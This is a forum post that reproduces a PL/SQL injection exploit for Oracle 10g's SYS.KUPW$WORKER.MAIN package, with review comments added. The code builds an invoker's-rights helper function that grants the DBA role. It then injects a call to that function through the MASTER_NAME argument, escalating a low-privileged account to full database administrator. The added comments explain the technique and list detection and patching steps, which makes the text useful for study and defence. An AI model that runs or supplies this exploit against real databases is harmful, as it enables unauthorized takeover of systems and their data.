
pub!1c 2007-1-25 22:08

Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit

.[code]
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <joxeankoret@yahoo.es>
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
-- Baseline: list the roles granted to the current session user before anything else runs.
-- USER_ROLE_PRIVS is the Oracle data-dictionary view of the caller's own role grants.
-- The identical query closes the script, so the two result sets can be compared.
select *
from user_role_privs
;

-- Helper function created in the caller's own schema (needs CREATE PROCEDURE, as the
-- header states). The anonymous block further down references it by name inside the
-- MASTER_NAME argument.
--
-- NOTE(review): the &#39; sequences in this listing are HTML-escaped single quotes left
-- by the forum archive; the text is not valid PL/SQL in this form.
--
-- Defender's view: a function in a low-privileged schema that combines
-- AUTHID CURRENT_USER, PRAGMA AUTONOMOUS_TRANSACTION and EXECUTE IMMEDIATE of a GRANT
-- is a strong indicator of a privilege-escalation helper. Auditing role grants
-- (changes visible in DBA_ROLE_PRIVS) and reviewing newly created PL/SQL objects in
-- application schemas will surface it.
CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
-- AUTHID CURRENT_USER (above) = invoker's rights: the body runs with the privileges of
-- whoever calls the function, not those of the schema that owns it.
-- The autonomous transaction lets the function issue its own COMMIT independently of
-- the calling statement; Oracle does not otherwise allow DDL/COMMIT in a function
-- invoked from within a SQL statement.
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
-- The privileged action: grants the DBA role to the account named TEST.
-- This only succeeds when the effective caller is allowed to grant DBA.
EXECUTE IMMEDIATE &#39;GRANT DBA TO TEST&#39;;
COMMIT;
-- Returns 1 so that a comparison of the form "<schema>.f1=1" evaluates to true.
RETURN(1);
END;
/

-- Anonymous block that calls SYS.KUPW$WORKER.MAIN with a crafted MASTER_NAME value.
--
-- NOTE(review): presumably the affected package concatenates MASTER_NAME into a
-- dynamically built SQL statement without binding or escaping it; that would be the
-- root cause. This listing does not show the package source, so confirm against the
-- vendor advisory for the "CPU Oct 2006" fix named in the header.
-- NOTE(review): the package is SYS-owned and presumably runs with definer's rights, so
-- an invoker's-rights function reached from inside it would execute as SYS; confirm.
--
-- Mitigation: apply the Critical Patch Update referenced in the header (or later),
-- review which accounts hold EXECUTE on SYS.KUPW$WORKER, and avoid handing
-- CREATE PROCEDURE to accounts that do not need it, since the technique depends on
-- the caller being able to create its own function.
DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
-- Built by concatenation: an escaped single quote, the text " or ", the current
-- schema name (USER), then ".f1=1--". The leading quote is meant to close a string
-- literal in the statement the package builds, and the trailing "--" comments out
-- whatever follows.
MASTER_NAME := &#39;&#39;&#39; or &#39; || user || &#39;.f1=1--&#39;;
-- Dummy value; only MASTER_NAME carries the crafted content.
MASTER_OWNER := &#39;bla&#39;;
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/

-- Post-check: the same role listing as at the top of the script.
-- A DBA row that appears here but not in the baseline means the GRANT inside F1 was
-- executed with elevated privileges; on a patched system the output should be unchanged.
select *
from user_role_privs
;

[/code]
